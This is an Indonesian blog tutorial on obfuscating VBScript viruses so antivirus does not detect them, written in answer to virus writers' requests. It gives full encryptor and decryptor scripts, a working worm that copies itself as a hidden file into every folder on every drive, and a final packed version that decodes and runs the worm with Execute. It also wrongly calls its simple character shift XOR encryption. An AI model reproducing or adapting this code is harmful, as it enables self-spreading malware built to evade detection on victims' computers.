Kamis, 17 Maret 2011

0

Teknik Enkripsi Virus VBS

  • Kamis, 17 Maret 2011
  • Bina Blogger
  • Share
  • Melihat banyaknya email dan forum yang menanyakan cara mengenkripsi virus vbs atau js,maka saya mau menulis tutorial cara mengenkripsi virus vbs. Bila anda menggunakan program atau script encrypter maka virus kamu akan didetect oleh antivirus sebagai Encrypter.Tools atau Encrypter.Gen. Untuk itu saya akan memberitahu cara enkripsi sederhana dan kamu dapat memilih sendiri karakter ASCII nya.
    Prinsip kerjanya begini, baca file perkarakter lalu ubah karakter demi karakter menjadi karakter ASCII(nomor ASCII +2). Jadi hasilnya, setiap huruf akan ditulis sebagai 2 huruf didepannya dalam tabel ASCII. Untuk unencrypt nya kamu cukup membalikan cara kerja encrypter tadi, yaitu mengurangkan karakter ASCIInya dengan 2. Lalu mengeksekusi yang telah di unencrypt tadi. Teknik ini disebut enkripsi XOR.Pusing ya.. hehehe saya juga pusing ;-) untuk meng enkripsi kamu harus mengubah semua karakter ” menjadi karakter ASCII lain, seperti ä,ö,æ,Æ,ô,ò dll. Tapi kamu harus tau berapa angka ASCIInya maka dari itu pertama kamu butuh table ASCII. ;Þ~
    Pertama, ketikan script dibawah ini untuk membuat tabel ASCII. Nah kamu bisa memilih karakter ASCII sesuai pilihanmu.
    01'<----------------- awal ASCII Tabel ---------------------->
    02for i=0 to 256
    03x=x+"angka "&i&" --> "&chr(i)&vbcrlf
    04next
    05 
    06Set Anton = CreateObject("Scripting.FileSystemObject")
    07Set hilman=anton.createtextfile("C:\ascii.txt")
    08hilman.write x
    09hilman.close
    10'<----------------- akhir ASCII Tabel --------------------->
    Lalu simpan dengan nama ascii.vbs dan jalankan. maka di drive C: akan terdapat file ascii.txt dan didalamnya terdapat angka beserta bentuk huruf ASCIInya dari 0 sampai 256(range ini bisa kamu pilih sendiri). Nah udah liat kan, sekarang buka virusmu ketik Ctrl+H(Replace). Isikan ” pada Find what dan ¤ pada Replace with. Klik Replace All dan Save. Kamu harus tau berapa angka ASCII ” dan ¤(caranya ya liat tabel tadi ;Þ)

    angka 34 –> ”
    angka 164 –> ¤
    Catatan : “jangan memilih kode ASCII yang telah ada dalam virus kamu, karena bila di enkripsi maka akan ikut diubah menjadi tanda kutip(“).
    Kedua, sekarang saatnya kita buat script encrypternya hehehe.. buka text editor kamu dan ketik script berikut :
    01'<---------------- awal encryptor ---------------------->
    02 Set Anton = CreateObject("Scripting.FileSystemObject")
    03 Set maVero=Anton.OpenTextFile("C:\suriv.vbe")
    04 virus=maVero.ReadAll
    05 On Error Resume Next
    06 VA3 = ""
    07 For I = 1 To Len(virus)
    08 Baca = Asc(Mid(virus, I, 1))
    09 If Baca = 164 Then
    10 'nah ini untuk karakter " yang kita tukar tadi..
    11 'jadi, jika ditemukan karakter ASCII 164(¤) maka..
    12 Tukar = Chr(215)
    13 'ubah jadi karakter ASCII 215(×)
    14 'nah selanjutnya terserah kamu, kalau kamu mau mengubah suatu huruf menjadi karakter ASCII yang
    15 'spesial silahkan asal di catat dan di ingat.
    16 ElseIf Baca = 10 Then
    17 Tukar = Chr(28)
    18 ElseIf Baca = 13 Then
    19 Tukar = Chr(29)
    20 Else
    21 Tukar = Chr(Baca - 1)
    22 End If
    23 hasil=hasil & Tukar
    24 Next
    25 Set hilman=anton.createtextfile("C:\hasil.txt")
    26 hilman.write hasil
    27hilman.close
    28'<----------------- akhir encryptor --------------------->
    ‘ini contoh file C:\suriv.vbe yang dipakai pada encryptor di atas.
    01'<---------[ awal contoh kode yang akan di encrypt ]------------>
    02On Error Resume Next
    03Set ElkaUNP = CreateObject("Scripting.FileSystemObject")
    04Set Padang = ElkaUNP.OpenTextFile(Wscript.ScriptFullName,1)
    05Kode = Padang.ReadAll
    06Set Drives = ElkaUNP.Drives
    07For each Drive in Drives
    08if Drive.isReady then
    09Periksa(Drive & "\")
    10End if
    11Next
    12Sub Periksa(Target)
    13On Error Resume Next
    14Set Elektronika = ElkaUNP.GetFolder(Target)
    15SumBar = Target & "\ElkaUNP.vbs"
    16if (SumBar <> "ElkaUNP.vbs") then
    17Set FT_UNP = ElkaUNP.CreateTextFile(SumBar)
    18FT_UNP.Write Kode
    19FT_UNP.Close
    20FT_UNP = ""
    21Set Atribut = ElkaUNP.GetFile(SumBar)
    22Atribut.Attributes = 35
    23SumBar = "ElkaUNP.vbs"
    24End if
    25For Each SubFolder in Elektronika.SubFolders
    26Periksa(SubFolder.Path)
    27Next
    28End Sub
    29'<---------[ akhir contoh kode yang akan di encrypt ]------------>
    Pada script diatas ada 3 karakter yang saya ubah jadi karakter ASCII. yaitu karakter :
    164 jadi 215
    10 jadi 28
    13 jadi 29
    (liat aja di tabel..;Þ~ huruf apa itu) dan selain yang tiga karakter itu, angka ASCII karakter-1(jika yang terbaca 40 maka diubah jadi chr(39) –> 40-1=39). Hasil file virus kamu yang telah di enkripsi akan ada di C:\Hasil.txt
    Ketiga, copy isi file ‘C:\Hasil.txt’ dan buat script encrypter berikut ini :
    01'<------------------- awal unencryptor --------------------->
    02Explorer="pastekan isi file C:\Hasil.txt diantara tanda kutip ini. Nah karena tanda kutip ini lah
    03saya menyuruh kamu menukar tanda kutip dengan yang lain, karena script tidak akan jalan kalau ada
    043 atau 4 tanda kutip <img src="http://www.spyrozone.net/hacking/wp-includes/images/smilies/icon_wink.gif" alt=";-)" class="wp-smiley"> "
    05Dim Microsoft
    06For I = 1 To Len(Explorer)
    07Internet = Asc(Mid(Explorer, I, 1))
    08If Internet = 215 Then
    09'jika menemukan karakter ASCII 215 maka
    10Windows = Chr(34)
    11'akan diubah menjadi tanda " kembali. sederhana kan..
    12'selanjutnya hanya kebalikan dari encryptor diatas(jika 10 diubah jadi 28 maka sekarang di
    13'kembalikan 28 jadi 10 <img src="http://www.spyrozone.net/hacking/wp-includes/images/smilies/icon_wink.gif" alt=";-)" class="wp-smiley">  dst
    14ElseIf Internet = 28 Then
    15Windows = Chr(10)
    16ElseIf Internet = 29 Then
    17Windows = Chr(13)
    18Else
    19Windows = Chr(Internet + 1)
    20End If
    21Microsoft = Microsoft & Windows
    22Next
    23 
    24Set Anton = CreateObject("Scripting.FileSystemObject")
    25Set hilman=anton.createtextfile("c:\hasilx.txt")
    26hilman.write Microsoft
    27hilman.close
    28'<------------------ akhir unencryptor --------------------->
    sekarang lihat file C:\hasilx.txt nah bandingkan dengan virus yang belum di enkrip, sama? kalau sama berarti tak ada error dalam enkripsinya.
    Terakhir, tambahkan execute pada akhir unencryptor sehingga menjadi seperti dibawah ini:
    01'<------------------ awal virus jadi --------------------->
    02'badan virus
    03Explorer="&;,,,,,,,,,Z `v`k bnmsng jncd x`mf `j`m ch dmbqxos \,,,,,,,,,,,,= Nm Dqqnq Qdrtld Mdws
    04Rds Dkj`TMO < Bqd`sdNaidbs'×Rbqhoshmf-EhkdRxrsdlNaidbs×( Rds O`c`mf < Dkj`TMO-NodmSdwsEhkd'Vrb
    05qhos-RbqhosEtkkM`ld+0( Jncd < O`c`mf-Qd`c@kk Rds Cqhudr < Dkj`TMO-Cqhudr Enq d`bg Cqhud hm Cq
    06hudr he Cqhud-hrQd`cx sgdm Odqhjr`'Cqhud % ×[×( Dmc he Mdws Rta Odqhjr`'S`qfds(
    07Nm Dqqnq Qdrtld Mdws Rds Dkdjsqnmhj` < Dkj`TMO-FdsEnkcdq'S`qfds( RtlA`q < S`qfds % ×[Dkj`TMO-
    08uar× he 'RtlA`q ;= ×Dkj`TMO-uar×( sgdm Rds ES^TMO < Dkj`TMO-Bqd`sdSdwsEhkd'RtlA`q( ES^
    09TMO-Vqhsd Jncd ES^TMO-Bknrd ES^TMO < ×× Rds @sqhats < Dkj`TMO-FdsEhkd'RtlA`q( @sq
    10hats-@ssqhatsdr < 24 RtlA`q < ×Dkj`TMO-uar× Dmc he Enq D`bg RtaEnkcdq hm Dkdjsqnmhj`-RtaE
    11nkcdqr Odqhjr`'RtaEnkcdq-O`sg( Mdws Dmc Rta &;,,,,,,,,,Z `jghq bnmsng jncd x`mf `j`m ch d
    12mbqxos \,,,,,,,,,,,,= "
    13'untuk unenkripsinya
    14Dim Microsoft
    15For I = 1 To Len(Explorer)
    16Internet = Asc(Mid(Explorer, I, 1))
    17If Internet = 215 Then
    18Windows = Chr(34)
    19ElseIf Internet = 28 Then
    20Windows = Chr(10)
    21ElseIf Internet = 29 Then
    22Windows = Chr(13)
    23Else
    24Windows = Chr(Internet + 1)
    25End If
    26Microsoft = Microsoft & Windows
    27Next
    28'untuk mengeksekusi hasil unenkripsi
    29Execute Microsoft
    30'<------------------ akhir virus jadi --------------------->
    Sekian dulu tuturial enkripsi virus VBS ini sebagai jawaban atas semua email yang
    menanyakan encryptor untuk virusnya sendiri. Dengan sedikit kreatif kamu bisa membuat encryptor kamu sendiri dari pengembangan encryptor di atas. Tutorial ini juga sebagai jawaban atas kurang jelasnya cara mengenkripsi virus yang terdapat saat ini. Terutama pada para pemula yang ‘agak’ butuh penjelasan panjang lebar.
    Greet’s to :
    • Indonesian Virus Writer dimana saja khususnya spidey yang suka membagi ilmunya hehehe.. :Þ~
    • SECTOR’S team,SevenC,dan pembuat virus VBS.Redlof dimanapun kamu berada.
    • Anak Warnet Payakumbuh(RiNaL,antho,alvin-s,peri,si bos,pak guru,yudi,ade dll)
    • MinangCrew, Kadal_Punk, Joehuntters, Aulia Abrar, Aldi_Member, Ridho(Elka02UNP), Adriyan, Bob dll.
    • Buat semua Anak Teknik Elektronika/Fakultas Teknik /UNP /Padang /SumBar /Indonesia.
    • Yance,Ee(toemis),Adek,Ata,Dodi(Bolot). hidup Payobasuang! dan yang tak tersebut namanya…
    Salam.

    0 Responses to “Teknik Enkripsi Virus VBS”

    Posting Komentar

    Subscribe